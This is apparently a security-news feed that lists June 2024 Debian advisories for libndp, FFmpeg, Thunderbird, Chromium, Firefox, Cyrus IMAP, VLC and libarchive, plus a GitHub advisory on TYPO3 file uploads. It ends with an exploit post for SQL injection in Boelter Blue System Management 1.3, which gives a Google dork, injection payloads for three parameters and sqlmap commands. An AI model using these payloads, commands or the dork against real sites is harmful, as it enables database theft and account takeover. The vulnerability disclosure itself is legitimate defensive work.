Debian Linux Security Advisory 5713-1 - A buffer overflow was discovered in libndp, a library implementing the IPv6 Neighbor Discovery Protocol (NDP), which could result in denial of service or potentially the execution of arbitrary code if malformed IPv6 router advertisements are processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5713-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 16, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libndpCVE ID         : CVE-2024-5564A buffer overflow was discovered in libndp, a library implementing theIPv6 Neighbor Discovery Protocol (NDP), which could result in denial ofservice or potentially the execution of arbitrary code if malformedIPv6 router advertisements are processed.For the oldstable distribution (bullseye), this problem has been fixedin version 1.6-1+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8-1+deb12u1.We recommend that you upgrade your libndp packages.For the detailed security status of libndp please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libndpFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZvJhIACgkQEMKTtsN8TjaFxRAAoZ0KcqyXTKSql5dnEURXQPpbzVnjYd4xnEzbunVupRTJnFmDpF/huBYl+Owh85Et0uUvEwYZIGb5bt47jStw4iBHYSG7AaWWPWmlqPT2izu461AL1njjDJh0i3BPGxTm1lY1k8tnUZkPp08BonJKnesSsogiFy51L0Apmug3/UJu9HrsUGGeVsI3oFHgxQWAe92f/9mTzst0J1BoGYC66n2CUISVUBUmyCBBKiPWbzVX5fSMu5ZAgRCCm+8VcEgFG2zZmOxaWqhlKmWNcraAsJmi4Y4Isp7AsmYFjHogY/jURDf5Y/CcdGuKwyGThk0sU67kbEgQDkCW+40OGU+WuEE+5cU5FytNZzNunsu9BZM+YqwrtRHBZhmJMr1+io9pJaX/a2wQqiHxOsb8wKbWnykDmgXRHd3qAj/XzRjzipebfr+5N7wOee8JritwniCimSSD3Uaev7HdFWO6DbhQZNH+EKpSgAZY0JlM96yIUafH6dwnH3NM/bBYP0iEbm+bXE8emF4XfkAU5TZuvPmsQgKCf8idgcHAE9a0jSv8e5bi4JNa0adLO+0B9RtuOhRGjhTtkkzwYeU1/07vGnQrZasDjZoFgHcnrXqD8hDFVYX4z8T4pn0AMe1BXLaAx83D8JOX2SqP6qiiwOGViSDyZl/JUGQ/zmUf2rEDU6fXBic==ilxi-----END PGP SIGNATURE-----

Debian Security Advisory 5713-1

Debian Linux Security Advisory 5712-1 - Several vulnerabilities have been discovered in the FFmpeg multimedia framework, which could result in denial of service or potentially the execution of arbitrary code if malformed files/streams are processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5712-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 15, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : ffmpeg  
CVE ID         : CVE-2023-50010 CVE-2023-51793 CVE-2023-51794  
                 CVE-2023-51795 CVE-2023-51798 CVE-2024-31585

Several vulnerabilities have been discovered in the FFmpeg multimedia  
framework, which could result in denial of service or potentially the  
execution of arbitrary code if malformed files/streams are processed.

For the stable distribution (bookworm), these problems have been fixed in  
version 7:5.1.5-0+deb12u1.

We recommend that you upgrade your ffmpeg packages.

For the detailed security status of ffmpeg please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/ffmpeg

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZt3FoACgkQEMKTtsN8  
TjZddQ/+M8SG7jUGvMp5yfB+cMC8/ycNNpZBVObPfxJPg8XYTEXq+ayMd0uGdQO8  
AjaLh+Z7/OOJQ5ZpVHTMcE+bmCV+vAAoYyprz/uX8QstMKkiHZ2/SE/1zNrYuAMC  
JnmX8jTPNDMjFxoXYH/a2+QVmH5/Wo5GmCHStYRfIdVqkG11s76bcrVdYQ99zhek  
NfOErXzd70z6zdk6KIMHLpFHbJCDSsWlHQPPvDidaMrGyVIs6mfh6tfcBfmTTB3m  
wpsTs/Z9prDRFMZUsph4AkMncYO9vfgWwervOckVDMosfuoSMo26DvaKqDUho20s  
Ej5S4tcgzzJ+L68itXoAfMLIc7ErjX+sMNPQB7Q4HnXwKH5fXkPIhmMoOC6NUPoe  
6DQpg0rabcJajdZM2wfnvpnyLf7dzCHjjTQD4CBL6vQp9U6MNK5nme/P5EjJAcI7  
TdT3VfLsi0QCZRnX0B71meCTUzg1BXThnhUriAaLF2QIpFuJs0qMwos7GLFtGXAD  
06WY6ctpiZ8F38v4y9W3O+FXOat8BBW3kOYc/FETEYXtjt9nnCy2AuwWrJ3oKNpE  
qaOI9ikfBbLxCXSW/G9RBSId6vK5tQeeypKY1sYwHRmVOeY8v7rtgi6x7uXHBktV  
sWTXFqtF3HlA8jLpJQjemMGNvLpGaOTK331IRNkSGygtcUrGAGQ=  
=nhZN  
-----END PGP SIGNATURE-----

Debian Security Advisory 5712-1

Debian Linux Security Advisory 5711-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5711-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 15, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2024-5688 CVE-2024-5690 CVE-2024-5691 CVE-2024-5693   
                 CVE-2024-5696 CVE-2024-5700 CVE-2024-5702

Multiple security issues were discovered in Thunderbird, which could  
result inthe execution of arbitrary code.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 1:115.12.0-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 1:115.12.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZto9cACgkQEMKTtsN8  
TjZXBhAAnSaDt9MYqXeJPvQm03CRoMX4NgoOoOX9Zx5lGKFHH44Ghy+ZbSc4jor6  
wEIBlrw9TpE4Cvgi6dfAtRCP9owpOl5M75FK8/YDIudPq349SJbRZRGXs0CPY5fL  
zxG5WcLPqRGT9S5wm+LQ9u2BcyOOTyDa1ICl1JQ+vPOY0r/7jjojbbkPh61a3UTq  
JGbwPYhsE4DZW6CG5OsOvzoX8/9docjO/DnTg2X6SM11Ti7IK77VJ02aT4F1dEby  
TXD5SUWws1euRgLQBY0qaOB1kbXfQJTpx6StV7aaGVfC07qQyv+PZgW9xEpbGyIF  
oGcOtTHZStQHnbQRonChBYmWjkDahmrVET73VY1gpv6nggNy9z3RcTjyWzobHBX3  
lfXJpvxtPF9/UpK2V6N5rd25F7Fq65Ldip8H/uCgJ2nL2u6qFSwrfujeaInoeDKk  
DpvkZXHJDFkim2uxjAnD1FVo88K4xa4cI8eUvN28VB1I0E+h4yHN4eIK3AgBlAiX  
+y9KoaMLVUdz29RZ/i2UngnX2K8V0P7Wqxk/SacMDiHuRt2LUt0yQQAmsSgb9CBb  
ajhbwAj/do+gsmroCz941w0O5pbmZ2Ggxqx8FiX223LwR7255IYj3qYWQd0kGXFr  
FxsZgxLryBMgBQuoDZVslO0rZ/klVZyDYS6S0C7+31lSfQAk7Og=  
=dDKM  
-----END PGP SIGNATURE-----

Debian Security Advisory 5711-1

Debian Linux Security Advisory 5710-1 - Security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5710-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonJune 14, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-5830 CVE-2024-5831 CVE-2024-5832 CVE-2024-5833                  CVE-2024-5834 CVE-2024-5835 CVE-2024-5836 CVE-2024-5837                  CVE-2024-5838 CVE-2024-5839 CVE-2024-5840 CVE-2024-5841                  CVE-2024-5842 CVE-2024-5843 CVE-2024-5844 CVE-2024-5845                  CVE-2024-5846 CVE-2024-5847Security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 126.0.6478.56-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmZsdK8ACgkQZF0CR8NudjdfEg//VIIK1hEPZju418flr9luWXi/NKh1PcwFVhDusF5V4q5zBIsqb/5oTuwo5dmZtj5muKUmC4WVhnSqwNtA+ctpr9HPxEcRrOORl2QCeYvdDQYOAFQR4StDAjOPFn196YlDrJ58b5mLez+6f6CpsrCV9XNH37v+nxB3FjwfGSUeLT2GcdArRdfxlFuMp7uKZ5Cg9jID2LeOf86sjIYMxZSMQ7lsqtQYFsXwYsHDCUzGqaQR1qS5IF1eQjTveHwKySMpe3HX9A3mkSZz05cgrmJNvuTbiD3DF5MiwiBxS+zH3pkfrE5OJjahmcw0lUHhvpd3zD2+4uuotIGWJ0OdfbOvbO+r4g2K3CoKFVoyBut1Mu721maoQ51fLsSlHBNu/jirIUi8TgZtOiSbNPAV4O6B8qOznnaeGic4uGFhg3R/lfrQSVSxrJG3NYBCBDjd5P4WrT8VkCCmkwVN3MTEuLRCA6Xj7O1h1GZrxsWxn0ySDzyl2aQCOiZXbxYGae3GzivetQyf8fpjZ2r4zCIxXZ58E+j9Xa32mpl/2xecazaYOv3QXSWO/zaRONCc0JoS5t3V5TU/p9jwDqV+DVYTd8unm7OcAumpQ7K8rPOZ24tjQjLg+wO5d6rFF80Vnz4RFKYsIJukoHJHb1R9DOzF/ufsj7//XzsaYc30Y6ni1HCivNU==p6S/-----END PGP SIGNATURE-----

Debian Security Advisory 5710-1

Debian Linux Security Advisory 5709-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, the bypass of sandbox restrictions or an information leak.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5709-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 12, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-5688 CVE-2024-5690 CVE-2024-5691 CVE-2024-5693   
                 CVE-2024-5696 CVE-2024-5700 CVE-2024-5702

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code, the bypass of sandbox restrictions or an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 115.12.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 115.12.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZp3moACgkQEMKTtsN8  
Tjatxw/9FfA9OK9R93tp9VFpY58Wszpi7nJYMtGHiXnZTIrVX8ujEvWOcXic/iKx  
yetUGpakGs4IU2+sTXDRqHhRupSOGVM642pBeXrX/WAGyyqJ0xGuMXDDSjlPu745  
UTywd2KEID9LxBCI6WOJXhiQXTpkA2oTJa63Hy1d04x19yCdlyMPvGFf6dvaZ5+C  
jzjPGmye+ym/SBkd+9eYafRqmauT+wn5N/SBHr+3EvY2Orssiw+0d1/HQ1Z+2n5/  
dzNW/npF7TlFrXtOb6GkKNP+agY6HrbMqg+2WWm1LkrexlJSBPCTg3PxXv//ejm2  
wd9eRyDyJnavwdDi4L4zXtMqLFouGFQdOYOB7qx+7yBfPUsp9arvMPaookrKxR5y  
HAjut/sbwODC6WJyWrEHP91OjFRrjkIK5YE2dgYrc5T03DMKW5oL0Ff4Pj+eUfbf  
fLyNQ2niC5MO9hO1H++u7sdWjQfZh6OrFEfw6Et1J/U5BIs7k5td4XvWtcyaTPHS  
mBtTV13yUV9In3ARt3Kl7KiszGp476mZe/FlAMYOfdvlDGHMSF9uOIf+m9G9pXg9  
gAYzkvFDAJ+Gih+iDunPCSjvREpsjplmukK3bpNuHi1I7po4puUcVdNLSg9KjEUf  
wzBZhyAplATbnhZ22+pFssFKXgGxjEI9Ovw/5K4mX3Rgt3rb+zU=  
=9bhr  
-----END PGP SIGNATURE-----

Debian Security Advisory 5709-1

Debian Linux Security Advisory 5708-1 - Damian Poddebniak discovered that the Cyrus IMAP server didn't restrict memory allocation for some command arguments which may result in denial of service. This update backports new config directives which allow to configure limits, additional details can be found at.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5708-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 11, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : cyrus-imapd  
CVE ID         : CVE-2024-34055

Damian Poddebniak discovered that the Cyrus IMAP server didn't restrict  
memory allocation for some command arguments which may result in denial  
of service. This update backports new config directives which allow to  
configure limits, additional details can be found at:

https://www.cyrusimap.org/3.6/imap/download/release-notes/3.6/x/3.6.5.html

These changes are too intrusive to be backported to the version of  
Cyrus in the oldstable distribution (bullseye). If the IMAP server is used  
by untrusted users an update to Debian stable/bookworm is recommended.  
In addition the version of cyrus-imapd in bullseye-backports will be  
updated with a patch soon.

For the stable distribution (bookworm), this problem has been fixed in  
version 3.6.1-4+deb12u2.

We recommend that you upgrade your cyrus-imapd packages.

For the detailed security status of cyrus-imapd please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/cyrus-imapd

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZoliMACgkQEMKTtsN8  
TjZehRAAmsG/uxV+I5d5ftA5Zt6vHzr+JGjjA9nOdRijRWI1eITjPIZV+IQgUszr  
rW/jgbYmRbzI1WNpHKp6bkB70s22bQjShw00MeLk1FSaQkTJyDIkA5sq/xiRM0Yn  
Ie8nVDaMhVpcYjfeFc/5ZKXZQoea4UiQpIKIGNdq/FHaY3vMja0xYvxVx+0BCrsc  
aRQrk/wyf7dBgS5HSiJpJruXOAW9zh3IBVF9IDXOpMDG266ymPUuIPmgRUwHjlwj  
TrWHkdiuHs6CO8zvETnukZOdJCebrfet6dE3/MFyt+Y3w+X6SLTzWD6quYV5rAp1  
yaxHlwaeewXaBeX90OoRGL4wYElbl6NJPc2SKi3/uTuDHGzAExqXXzorhvGcmVgG  
SGmMlcSAp9CLNo9/VznMo8q3TJq6+RaJ1ivqh163fisQxsigsG3DjuBM0uBEHHXJ  
z/W7VCYVm1VcYsR3PCpfPI81Ds92SNHBf9HsDYI07fJV82BZ+EIPiXa6a9SAfI4+  
dbG4C9Rz7tmh5XCVHBTg8ZxlJQhrF2S67ENI6IxjHjyLVfJiYVReEJ06GiytkcJ0  
ZYzXu8pRjDP8s/jynCPGbmWbXSEEW6QykOWPT1qM2Uq5lGxZluKIKQySs+GJ6UJx  
guHK1eC2XCc4p9FDtEq6Nd0C593VPoYyf7CTqVKXfBL/N0uk/7U=  
=rPUU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5708-1

Debian Linux Security Advisory 5707-1 - A buffer overflow was discovered in the MMS module of the VLC media player.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5707-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 11, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : vlcCVE ID         : not yet availableA buffer overflow was discovered in the MMS module of the VLC mediaplayer.For the oldstable distribution (bullseye), this problem has been fixedin version 3.0.21-0+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 3.0.21-0+deb12u1.We recommend that you upgrade your vlc packages.For the detailed security status of vlc please refer toits security tracker page at:https://security-tracker.debian.org/tracker/vlcFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmZolW0ACgkQEMKTtsN8TjYXjQ//UMm9CCL7ivyD16+UEH9s7pub7+9V2NKFzU1Zfj4Ta1Ikfn6ECd1NXx+RvEs03+UPor090UGHllCSXxuRLhjbM7UuqlQu3orrVBKu7+ZojMEPKV33eCsB2t883qHEZ4ln2SgVlELeATeQIa8AAN3Zu1ryiw0RVvNzFVMdvpzSKtDsK8Ioi1qR6Om+dHXZ27/vDgVu/seT7YXzZ4yKByiutPEgUIBsGFw0075siRycKn9jQg5yrtbGZPG0xVQIT+6+e5pXgO7O/Mofb7SI6k/pedO+m1iXjeE5kfXmhBRpILWtzF+gwD/GPALzoj9VBgdRv+cf8YtwFlc8V2IamrLrQcNr/sSe5AtPkVjibL2QqI7D250qrX1Lrwp9x6jfkkevx9AuMtlEM1o/vdzD2toVuOphKxGpcsH5skRiYf7BJ6W7qe6hth3YyQQdAziS1RZUsYKh0v/yotjAfykUcnBgnLwzzfq2G/+/R0vYHFz/PbVrA+bCPLSArPy60BXRgH5VQKl6yJwgst16Uq0Kke3zYhF55XHISjifjLh1rH/omzTH+OtXWLl6VvTkELrw05ER7sBB4ufilThjMOv4qB2WgaAcJgaTWcKekTwdwcOi5OJvMjDcQeTtWsYm3iub3jWGatY69JGqQPGfesHIxjZE2nlhdDdiAhOcPgS1u1+mZh0==TPrH-----END PGP SIGNATURE-----

Debian Security Advisory 5707-1

Due to missing file extensions in $GLOBALS['TYPO3_CONF_VARS']['BE'][‘fileDenyPattern’], backend users are allowed to upload *.phar, *.shtml, *.pl or *.cgi files which can be executed in certain web server setups. A valid backend user account is needed in order to exploit this vulnerability.

Derivatives of Debian GNU Linux are handling *.phar files as PHP applications since PHP 7.1 (for unofficial packages) and PHP 7.2 (for official packages).

The file extension *.shtml is bound to server side includes which are not enabled per default in most common Linux based distributions. File extension *.pl and *.cgi require additional handlers to be configured which is also not the case in most common distributions (except for /cgi-bin/ location).

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-8h4m-r4wm-xj7r

**TYPO3 Arbitrary Code Execution via File List Module**

High severity GitHub Reviewed Published Jun 7, 2024 to the GitHub Advisory Database • Updated Jun 7, 2024

**Package**

**Affected versions**

\>= 8.0.0, < 8.7.23

\>= 9.0.0, < 9.5.4

**Patched versions**

8.7.23

9.5.4

Due to missing file extensions in $GLOBALS\['TYPO3\_CONF\_VARS'\]\['BE'\]\[‘fileDenyPattern’\], backend users are allowed to upload \*.phar, \*.shtml, \*.pl or \*.cgi files which can be executed in certain web server setups. A valid backend user account is needed in order to exploit this vulnerability.

Derivatives of Debian GNU Linux are handling \*.phar files as PHP applications since PHP 7.1 (for unofficial packages) and PHP 7.2 (for official packages).

The file extension \*.shtml is bound to server side includes which are not enabled per default in most common Linux based distributions. File extension \*.pl and \*.cgi require additional handlers to be configured which is also not the case in most common distributions (except for /cgi-bin/ location).

**References**

*   TYPO3/typo3@095ae4a
*   TYPO3/typo3@9990278
*   https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/2019-01-22-7.yaml
*   https://typo3.org/security/advisory/typo3-core-sa-2019-008

Published to the GitHub Advisory Database

Jun 7, 2024

GHSA-8h4m-r4wm-xj7r: TYPO3 Arbitrary Code Execution via File List Module

Debian Linux Security Advisory 5706-1 - An integer overflow vulnerability in the rar e8 filter was discovered in libarchive, a multi-format archive and compression library, which may result in the execution of arbitrary code if a specially crafted RAR archive is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5706-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoJune 05, 2024                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libarchiveCVE ID         : CVE-2024-26256Debian Bug     : 1072107An integer overflow vulnerability in the rar e8 filter was discovered inlibarchive, a multi-format archive and compression library, which mayresult in the execution of arbitrary code if a specially crafted RARarchive is processed.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.2-1+deb12u1.We recommend that you upgrade your libarchive packages.For the detailed security status of libarchive please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/libarchiveFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmZgy+pfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0ScPRAAi2HFosqr3NeyDgV7gT3bTjKrq5EwrG9HIYS0e21KPfLteXxcsDjNkfzNnhSY0CoEL29/vyQpON+ht1En7utYtiLrSgDcjak4E26mBcMy2haL3hqMuGQiJTGkclBUQ4iHFU1SL6+KoNEgpNPIDBgDtbVDTNJUz66IUTl/QTjPvTsbUkSdSuXAvN9C9k5AEkSq4CIYl5UAQk4yJZ1MrU6pWdqPt6cpWULyaI5bIkC+fKdJ5T+2ElTnCT9VM/lkdePtI3V9iwj0vjEpelhmUlojjRUbbyuH+tDiCMUFj+GZueVvdZX1UuO4Je29vcNZ4VU6YvxU5gsgnQb09KnZd5EFGnqGNBnaEq+EEzW3Q4p2non4q6PUj8H0qzgNDMz8fxXuwdIh/8bVkmRNVQPJFurfLp5aU4ECQ4NROk3rg/sotyAjgQb6QeP2tcaxH0sKfgDc+SgcFgbUrGZ3CLanWiv19x7Oggt/I4DX/16GFSq3Z8xMzNlZOIotyr2TbKrIaPxwDrDyk8Qs2f6aPKOHZgiAIEOicpu3FP9Dr+oU9K/a8N2oDuz5Vwt4XOofN25GGZdhTTZtQ4uHBgEx1pmsWhpycdFSPUVHXW3pGoMNgIkOKau/oid73v224koBXe2eWygGE9Tnk9EDL9FtqYRbq+zTJGElcF7URbVRrxR5MVE8Ejs==BFbJ-----END PGP SIGNATURE-----

Debian Security Advisory 5706-1

Boelter Blue System Management version 1.3 suffers from a remote SQL injection vulnerability.

    Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)Google Dork: inurl:"Powered by Boelter Blue"Date: 2024-06-04Exploit Author: CBKB (DeadlyData, R4d1x)Vendor Homepage: https://www.boelterblue.comSoftware Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_USVersion: 1.3Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12CVE: CVE-2024-36840Vulnerability Details:Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.PoC:web server operating system: Linux Debian 9 (stretch)web application technology: Apache 2.4.25back-end DBMS: MySQL >= 5.0.12[22:21:39] [INFO] fetching database namesavailable databases [5]:[*] Anchor5Digital1. news_details.php?id parameter:Type: Boolean-based blindPayload: id=10071 AND 4036=4036Type: Time-based blindPayload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs2. services.php?section parameter:Type: Boolean-based blindPayload: section=(SELECT (CASE WHEN (1087=1087) THEN 5081 ELSE (SELECT 8711 UNION SELECT 5881) END))Type: Time-based blindPayload: section=5081 AND (SELECT 2101 FROM (SELECT(SLEEP(5)))nmcL)Example SQLMap Command: sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs3. location_details.php?id parameter:Type: Boolean-based blindPayload: id=836 AND 4036=4036Type: Time-based blindPayload: id=836 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)Type: UNION queryPayload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Example SQLMap Command: sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbsImpact:Unauthorized access to the database.Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials.Account takeovers and potential full control of the affected application.Discoverer(s)/Credits:CBKB (DeadlyData, R4d1x)References:https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840

Tag

#debian